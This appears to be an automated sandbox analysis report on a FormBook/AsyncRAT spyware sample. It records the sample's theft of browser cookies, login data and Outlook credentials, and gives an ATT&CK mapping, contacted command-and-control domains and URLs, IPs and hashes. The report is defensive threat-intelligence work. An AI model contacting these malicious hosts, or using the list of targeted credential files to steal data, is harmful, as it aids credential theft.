Source: mErdTxurOiTQQ.exe, 0000000B.00000002.3126162382.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000B.00000000.1583381977.0000000000FA1000.00000002.00000001.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000D.00000002.3126721072.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Queries volume information: C:\Users\user\Desktop\ydJaT4b5N8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 10.2.ydJaT4b5N8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ydJaT4b5N8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3127827624.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1660637052.0000000001260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3127701911.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3129343241.0000000005450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1662457290.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3126887129.0000000002570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\fontview.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\fontview.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 10.2.ydJaT4b5N8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ydJaT4b5N8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3127827624.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1660637052.0000000001260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3127701911.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3129343241.0000000005450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1662457290.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3126887129.0000000002570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ydJaT4b5N8.exe	39%	Virustotal		Browse
ydJaT4b5N8.exe	63%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
ydJaT4b5N8.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.biumini.xyz/avm2/	0%	Avira URL Cloud	safe
http://www.biumini.xyz/avm2/?FT=6flP2NBanoj1mJhTT9CcmrsvLKpegCBIyTYKy6cM/MLUWAXAJvJCIjNuYRuuhMslcuSeXmXhbRN15WMnyNK6Lzjzu1vwOU2WN5AiA5/FDSnJY+GQW2n8GmjYxtSliihue8e28SerNnoc&LZXLP=uRtDln	0%	Avira URL Cloud	safe
http://www.rtpbnmax.shop/slmn/?LZXLP=uRtDln&FT=vxRo/NbVr8++Da/4WcnE3/CMt1mo3pQSabR/jnYcNQmpsvXfiQpyTUTP9jDEDnRaomHmWLK2jOKhHQ02TF4XNId4tyIZnHFEhbycwWoVa5WMOCY2OT/zuf88phewPkHObckRHqNeZZ6B	0%	Avira URL Cloud	safe
http://www.rtpbnmax.shop/slmn/	0%	Avira URL Cloud	safe
http://www.yxni.vip/d7uk/	0%	Avira URL Cloud	safe
http://comect.online/cs7c/?FT=CdryMvIuRPhrhNp	0%	Avira URL Cloud	safe
http://www.creaturpace.xyz/iqne/?FT=VjyLh8/TQUU29ht9sglv6JaML71ZquykbcLw6LPhnWCKA7K1Zlfytdmm6EghNtNIJzDGRbJ4b+Pf1nzjNE47Qwrk29fp3z3J9k0CszfKgPRR/UIQYMjTRi1CBqkwXRex3HM9PnLmwRgb&LZXLP=uRtDln	0%	Avira URL Cloud	safe
http://www.creaturpace.xyz/iqne/	0%	Avira URL Cloud	safe
http://www.10000.space/3zfl/?FT=dzW3r0JajFi4yU+t5A3d9Cj0KGYHP6jpjSNWRO4j4rUaxvSRRHR1AwWhDoruFd3w8D11XAT8WPBX/+s6mj4ahUfcluh1giEyYW754F2hOtLVKwjjTtv3gq1pskTXS46vpAuqfW2BmGlQ&LZXLP=uRtDln	0%	Avira URL Cloud	safe
http://www.yxni.vip/d7uk/?FT=Ww2A09LOqGBMTXt4MedKcPRCMpeKWxT/u0+P61SifFgERUvdQ+vHh8C9RtfMyLt44cTnxS353sxTMKGc1pO1hMJRS0vlIay91RDnqzSNCPeQGM5pjPJ3viUn+HC98mxcn5WmZtajdbPS&LZXLP=uRtDln	0%	Avira URL Cloud	safe
http://www.comect.online/cs7c/?FT=CdryMvIuRPhrhNp+O2hlvAXT+rMadDvfHxUD4gw+9ftZ82ygsyKDcDrn5TCIrgxbP6qLLp4j5uEJgTcnyoCHETCu03cQKbTqCiBrBkjQVvF/A9AiZwKEYph/IvS0e338ZMVaN10w+ZCw&LZXLP=uRtDln	0%	Avira URL Cloud	safe
http://www.10000.space/3zfl/	0%	Avira URL Cloud	safe
http://www.vilakodsiy.sbs/vq3j/	0%	Avira URL Cloud	safe
http://www.vilakodsiy.sbs	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rtpbnmax.shop	67.223.118.94	true	true	unknown
www.creaturpace.xyz	209.74.79.42	true	true	unknown
www.comect.online	124.6.61.130	true	false	unknown
www.10000.space	13.248.169.48	true	true	unknown
g30fc9e.cdn.limbocdn.com	45.113.82.65	true	true	unknown
www.vilakodsiy.sbs	104.21.48.1	true	true	unknown
www.yxni.vip	192.186.57.30	true	true	unknown
www.biumini.xyz	unknown	unknown	true	unknown
www.rtpbnmax.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.yxni.vip/d7uk/?FT=Ww2A09LOqGBMTXt4MedKcPRCMpeKWxT/u0+P61SifFgERUvdQ+vHh8C9RtfMyLt44cTnxS353sxTMKGc1pO1hMJRS0vlIay91RDnqzSNCPeQGM5pjPJ3viUn+HC98mxcn5WmZtajdbPS&LZXLP=uRtDln	true	Avira URL Cloud: safe	unknown
http://www.rtpbnmax.shop/slmn/	true	Avira URL Cloud: safe	unknown
http://www.creaturpace.xyz/iqne/	true	Avira URL Cloud: safe	unknown
http://www.biumini.xyz/avm2/	true	Avira URL Cloud: safe	unknown
http://www.creaturpace.xyz/iqne/?FT=VjyLh8/TQUU29ht9sglv6JaML71ZquykbcLw6LPhnWCKA7K1Zlfytdmm6EghNtNIJzDGRbJ4b+Pf1nzjNE47Qwrk29fp3z3J9k0CszfKgPRR/UIQYMjTRi1CBqkwXRex3HM9PnLmwRgb&LZXLP=uRtDln	true	Avira URL Cloud: safe	unknown
http://www.rtpbnmax.shop/slmn/?LZXLP=uRtDln&FT=vxRo/NbVr8++Da/4WcnE3/CMt1mo3pQSabR/jnYcNQmpsvXfiQpyTUTP9jDEDnRaomHmWLK2jOKhHQ02TF4XNId4tyIZnHFEhbycwWoVa5WMOCY2OT/zuf88phewPkHObckRHqNeZZ6B	true	Avira URL Cloud: safe	unknown
http://www.yxni.vip/d7uk/	true	Avira URL Cloud: safe	unknown
http://www.10000.space/3zfl/?FT=dzW3r0JajFi4yU+t5A3d9Cj0KGYHP6jpjSNWRO4j4rUaxvSRRHR1AwWhDoruFd3w8D11XAT8WPBX/+s6mj4ahUfcluh1giEyYW754F2hOtLVKwjjTtv3gq1pskTXS46vpAuqfW2BmGlQ&LZXLP=uRtDln	true	Avira URL Cloud: safe	unknown
http://www.biumini.xyz/avm2/?FT=6flP2NBanoj1mJhTT9CcmrsvLKpegCBIyTYKy6cM/MLUWAXAJvJCIjNuYRuuhMslcuSeXmXhbRN15WMnyNK6Lzjzu1vwOU2WN5AiA5/FDSnJY+GQW2n8GmjYxtSliihue8e28SerNnoc&LZXLP=uRtDln	true	Avira URL Cloud: safe	unknown
http://www.vilakodsiy.sbs/vq3j/	true	Avira URL Cloud: safe	unknown
http://www.comect.online/cs7c/?FT=CdryMvIuRPhrhNp+O2hlvAXT+rMadDvfHxUD4gw+9ftZ82ygsyKDcDrn5TCIrgxbP6qLLp4j5uEJgTcnyoCHETCu03cQKbTqCiBrBkjQVvF/A9AiZwKEYph/IvS0e338ZMVaN10w+ZCw&LZXLP=uRtDln	false	Avira URL Cloud: safe	unknown
http://www.10000.space/3zfl/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://comect.online/cs7c/?FT=CdryMvIuRPhrhNp	fontview.exe, 0000000C.00000002.3128854524.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000D.00000002.3127429206.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1959256452.000000000A454000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://localhost/arkanoid_server/requests.php	ydJaT4b5N8.exe, 00000000.00000002.1424852227.00000000026A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	fontview.exe, 0000000C.00000003.1852822596.00000000076A8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.vilakodsiy.sbs	mErdTxurOiTQQ.exe, 0000000D.00000002.3129343241.00000000054B5000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
124.6.61.130	www.comect.online	Singapore	132425	APC-HOSTING-SGAPCHostingPteLtdSG	false
104.21.48.1	www.vilakodsiy.sbs	United States	13335	CLOUDFLARENETUS	true
13.248.169.48	www.10000.space	United States	16509	AMAZON-02US	true
209.74.79.42	www.creaturpace.xyz	United States	31744	MULTIBAND-NEWHOPEUS	true
45.113.82.65	g30fc9e.cdn.limbocdn.com	Hong Kong	38197	SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong	true
192.186.57.30	www.yxni.vip	United States	395776	FEDERAL-ONLINE-GROUP-LLCUS	true
67.223.118.94	rtpbnmax.shop	United States	15189	VIMRO-AS15189US	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588745
Start date and time:	2025-01-11 05:02:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ydJaT4b5N8.exe renamed because original name is a hash value
Original Sample Name:	f649cb30517d1962e1fcf02cdd1e7cec98731954b308f3c61bdb8b8530a44f18.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@7/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 94 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.107.246.45, 52.149.20.212, 20.12.23.50, 20.190.159.71
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
124.6.61.130	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	www.comect.online/hmf8/
124.6.61.130	Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe	Get hash	malicious	FormBook	Browse	www.comect.online/hmf8/
104.21.48.1	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/j2vs/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
13.248.169.48	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	www.lovel.shop/rxts/
	PGK60fNNCZ.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.remedies.pro/a42x/
	zAg7xx1vKI.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	www.sfantulandrei.info/wvsm/
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	www.optimismbank.xyz/98j3/
	e47m9W6JGQ.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	www.shipley.group/wfhx/
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	www.autonomousoid.pro/m1if/
	fFoOcuxK7M.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.vilakodsiy.sbs	4sfN3Gx1vO.exe	Get hash	malicious	FormBook	Browse	104.21.64.1
www.yxni.vip	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	192.186.57.30
	print preview.js	Get hash	malicious	FormBook	Browse	192.186.57.30
	1013911.js	Get hash	malicious	FormBook	Browse	192.186.57.30
www.comect.online	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	124.6.61.130
www.comect.online	Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe	Get hash	malicious	FormBook	Browse	124.6.61.130

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	leUmNO9XPu.exe	Get hash	malicious	HawkEye, MailPassView	Browse	104.19.223.79
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	ZeAX5i7cGB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	jKqPSehspS.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	104.21.32.1
	A6AHI7Uk18.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Wru9ycO2MJ.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	iNFGd6bDZX.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	104.18.73.116
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong	https://199.188.109.181	Get hash	malicious	Unknown	Browse	112.213.108.9
	JP1KbvjWcM.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	103.19.190.184
	armv6l.elf	Get hash	malicious	Unknown	Browse	117.19.90.30
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	112.213.116.149
	file.exe	Get hash	malicious	XWorm	Browse	112.213.116.149
	arm5.elf	Get hash	malicious	Unknown	Browse	117.19.102.86
	jew.ppc.elf	Get hash	malicious	Unknown	Browse	112.213.114.230
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	117.19.113.75
	wFg25zfjIL.dll	Get hash	malicious	Unknown	Browse	103.45.64.91
	wFg25zfjIL.dll	Get hash	malicious	Unknown	Browse	103.45.64.91
AMAZON-02US	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	n2pGr8w21V.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	PGK60fNNCZ.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	76.223.54.146
	zAg7xx1vKI.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	1SxKeB4u0c.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	5.elf	Get hash	malicious	Unknown	Browse	157.175.218.227
	BzK8rQh2O3.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
MULTIBAND-NEWHOPEUS	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	209.74.77.109
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	209.74.79.41
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	209.74.79.41
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	0Wu31IhwGO.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
APC-HOSTING-SGAPCHostingPteLtdSG	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	124.6.61.130
	Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe	Get hash	malicious	FormBook	Browse	124.6.61.130
	dB5EGM8l20.dll	Get hash	malicious	Wannacry	Browse	103.14.213.194

Process:	C:\Users\user\Desktop\ydJaT4b5N8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\FyF7rO8j-P

Download File

Process:	C:\Windows\SysWOW64\fontview.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.781368274308237
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ydJaT4b5N8.exe
File size:	810'496 bytes
MD5:	fee446d6526018c56dad7b2a1d9985d9
SHA1:	72bef49603c18177836454c60be5c8efcdafa276
SHA256:	f649cb30517d1962e1fcf02cdd1e7cec98731954b308f3c61bdb8b8530a44f18
